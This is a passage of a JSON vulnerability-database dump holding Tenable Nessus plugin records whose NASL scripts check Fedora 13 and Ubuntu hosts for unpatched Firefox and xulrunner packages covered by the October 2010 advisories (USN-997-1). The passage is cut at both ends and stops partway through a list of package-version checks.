value:\"http://www.nessus.org/u?d4ae1e85\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b115b82\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcf76dcb\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049832.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0aba3310\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049833.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4bea5fe2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a0b91fe2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049835.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e41d79b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"firefox-3.6.11-1.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"galeon-2.0.7-34.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"gnome-python2-extras-2.25.3-23.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"gnome-web-photo-0.9-13.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"mozvoikko-1.0-15.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc13.18\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"xulrunner-1.9.2.11-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:46", "references": [], "pluginID": "50082", "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate Gopher URLs. If a user were tricked into opening a crafted file via Gopher, an attacker could possibly run arbitrary JavaScript.\n(CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the same-origin policy by using modal calls with JavaScript. An attacker could exploit this to steal information from another site.\n(CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2010-10-21T00:00:00", "title": "Ubuntu 8.04 LTS / 9.04 / 9.10 / 10.04 LTS / 10.10 : firefox, firefox-3.0, firefox-3.5, xulrunner-1.9.1, xulrunner-1.9.2 vulnerabilities (USN-997-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-08-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:abrowser", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2", "p-cpe:/a:canonical:ubuntu_linux:firefox-mozsymbols", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-libthai", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-libthai", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1", "p-cpe:/a:canonical:ubuntu_linux:firefox-branding", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dbg", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dbg", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1", "p-cpe:/a:canonical:ubuntu_linux:firefox-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-venkman", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-gnome-support", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-branding", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1", "cpe:/o:canonical:ubuntu_linux:10.10", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite-dev", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:abrowser-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dev", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-dev", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0", "p-cpe:/a:canonical:ubuntu_linux:firefox-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-2", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1-branding", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9"], "id": "UBUNTU_USN-997-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-997-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50082);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/06 14:03:15\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253);\n script_xref(name:\"USN\", value:\"997-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 9.04 / 9.10 / 10.04 LTS / 10.10 : firefox, firefox-3.0, firefox-3.5, xulrunner-1.9.1, xulrunner-1.9.2 vulnerabilities (USN-997-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref,\nGary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski\ndiscovered various flaws in the browser engine. An attacker could\nexploit this to crash the browser or possibly run arbitrary code as\nthe user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws\nin the JavaScript engine. An attacker could exploit this to crash the\nbrowser or possibly run arbitrary code as the user invoking the\nprogram. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate\nGopher URLs. If a user were tricked into opening a crafted file via\nGopher, an attacker could possibly run arbitrary JavaScript.\n(CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the\nsame-origin policy by using modal calls with JavaScript. An attacker\ncould exploit this to steal information from another site.\n(CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not\nproperly setup the LD_LIBRARY_PATH environment variable. A local\nattacker could exploit this to execute arbitrary code as the user\ninvoking the program. (CVE-2010-3182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-libthai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-venkman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-libthai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-mozsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2010-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|9\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 9.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif 